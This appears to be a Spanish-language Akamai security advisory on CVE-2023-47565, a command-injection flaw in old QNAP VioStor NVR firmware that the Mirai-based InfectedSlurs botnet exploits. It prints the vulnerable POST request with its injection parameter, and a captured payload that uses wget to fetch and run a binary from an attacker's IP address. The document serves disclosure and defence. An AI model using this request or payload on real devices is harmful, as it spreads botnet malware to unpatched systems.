Vulnerabilidad explotada de forma activa en QNAP VioStor NVR: corregida, parches disponibles
Resumen ejecutivo
El equipo de respuesta a incidentes e inteligencia en seguridad (SIRT) de Akamai ha publicado una actualización adicional a la serie de avisos sobre InfectedSlurs ahora que uno de los proveedores afectados ha publicado información de aviso y directrices.
La vulnerabilidad en QNAP se identificó en el mundo real y se le ha asignado el ID CVE-2023-47565 de CVE con una puntuación de CVSS v3 de 8,0.
Las cargas útiles maliciosas capturadas en el mundo real instalan un malware basado en Mirai con la intención de crear una botnet de ataques distribuidos de denegación de servicio (DDoS) .
Hemos proporcionado una amplia lista de indicadores de compromiso (IOC), reglas de Snort y reglas de YARA en la investigación original para ayudar a identificar estos intentos de explotación en el mundo real y posibles infecciones activas en redes de defensores.
Lo que necesita saber
Como parte de la investigación sobre InfectedSlurs, el equipo SIRT detectó una vulnerabilidad en los dispositivos de grabación de vídeo en red (NVR) que se están explotando en el mundo real. El dispositivo NVR es una solución de vigilancia de red de alto rendimiento para la supervisión basada en red de cámaras IP, grabación de vídeo, reproducción y acceso remoto a datos. A esta vulnerabilidad se le ha dado el ID CVE-2023-47565 de CVE con una puntuación de CVSS v3 de 8,0.
Esta vulnerabilidad permite que un atacante autenticado consiga inyectar comandos del sistema operativo con una carga útil que se entrega a través de una solicitud POST a la interfaz de gestión. En su configuración actual, utiliza las credenciales predeterminadas del dispositivo en las cargas útiles capturadas.
Están afectadas las siguientes versiones del firmware QNAP VioStor NVR:
VioStor NVR: Versiones 5.0.0 y anteriores (la 5.0.0 se publicó el 21 de junio de 2014)
QNAP considera suspendida la asistencia técnica para estos dispositivos; sin embargo, el proveedor recomienda actualizar el firmware de VioStor de los dispositivos existentes a la última versión disponible. Este problema se había corregido anteriormente con la aplicación, de un parche, aunque nunca se informó/divulgó públicamente. Además, los usuarios deben cambiar las contraseñas predeterminadas en sus dispositivos.
Por último, US-CERT ha emitido un aviso.
Explotación observada
Al principio, cuando revisamos las cargas útiles de explotación durante la campaña de InfectedSlurs, solo informamos de dos vulnerabilidades de día cero, ya que el equipo no pudo vincular con seguridad la explotación observada con un dispositivo o fabricante concretos. Esto dificultaba la confirmación de la clasificación de día cero de la explotación.
Tras un examen más profundo de varios aspectos de la explotación y la carga útil, el equipo SIRT consideró que el objetivo eran los dispositivos QNAP VioStor NVR. Estos dispositivos se ajustaban al perfil de objetivo de la campaña y se suministraban con credenciales predeterminadas débiles (se encuentran en sus manuales y se observan en la explotación). Al igual que con los dos primeros días cero, los dispositivos infectados podrían facilitar las vulnerabilidades de inyección de comandos del sistema operativo en la configuración de NTP de los dispositivos afectados del Internet de las cosas (IoT) y NVR.
Después de transmitirle estas teorías, US-CERT se coordinó con SIRT de Akamai y QNAP para revisar las pruebas y ayudar a confirmar las teorías del equipo SIRT. En última instancia, QNAP confirmó que las cargas útiles se dirigían a sus dispositivos VioStor, que ya se han retirado y no reciben asistencia técnica , pero solo atacaban a versiones anteriores (5.0.0 o anteriores) de su firmware previamente publicado.
La vulnerabilidad se explota realizando un POST a la ruta /cgi-bin/server/server.cgi . La ejecución remota de código (RCE) existe donde se especifica el argumento de SPECIFIC_SERVER (Figura 1).
URL:
/cgi-bin/server/server.cgi?func=server02_main_submit&counter=8.540406879901406&APPLY=
PAYLOAD:
time_mode=2&time_YEAR=0&time_MONTH=0&time_DAY=0&time_HOUR=0&time_MINUTE=0&time_SECOND=0&enable_rtc=1&TIMEZONE=50&year=&month=&day=&CONFIGURE_NTP=on&SPECIFIC_SERVER=[RCE_PAYLOAD]
Fig. 1: Intento de explotación de la RCE mediante la inyección de comandos
En la Figura 2 se muestra un ejemplo de carga útil de infección capturada.
wget+http://94.156.68.148/zerx86;chmod+777+*;./zerx86+viox86
Fig. 2: Carga útil de RCE capturada
Las prácticas básicas de seguridad son importantes
Lo básico importa. Estas observaciones subrayan una vez más la importancia de las prácticas recomendadas de seguridad básicas, como cambiar las contraseñas predeterminadas en los dispositivos durante la configuración inicial. También destacan la importancia de implementar protocolos de seguridad proactivos a largo plazo aún más estrictos, como garantizar una actualización uniforme de los sistemas como protección frente a posibles ataques y, ocasionalmente, comprobar los sistemas/dispositivos, especialmente si se observa en ellos un comportamiento extraño.
Conclusión
Una vez más, nuestra implementación personalizada de la red como cebo ha proporcionado información valiosa sobre los ciberataques, revelando vulnerabilidades que antes eran desconocidas. La presencia de credenciales predeterminadas y sistemas en red obsoletos y sin asistencia técnica ha demostrado ser una vía para las infecciones de botnets. Los sistemas heredados son un terreno fértil para detectar y explotar nuevas vulnerabilidades con el fin de propagar el malware.
Este hallazgo pone de relieve la importancia crítica de mejorar la concienciación y la formación sobre las prácticas recomendadas para el IoT, destacando los riesgos asociados para el consumidor medio. La necesidad de concienciación se extiende más allá de los consumidores y se aplica también a los fabricantes de estos dispositivos. Unos ciclos de soporte de software más largos y la seguridad durante la configuración, como pueden ser los cambios obligatorios de contraseña, son fundamentales para mantener la seguridad del sistema.
No se lo pierda
El grupo de inteligencia sobre seguridad de Akamai seguirá supervisando amenazas como estas e informando sobre ellas para concienciar a nuestros clientes y a la comunidad de seguridad en general. Para obtener más información, síganos en X, antes conocido como Twitter, para estar al día de lo que descubrimos.
El equipo SIRT de Akamai desea agradecer a CISA, US-CERT y QNAP su asistencia en nuestras comunicaciones, coordinación, identificación, corrección y esfuerzos de divulgación.
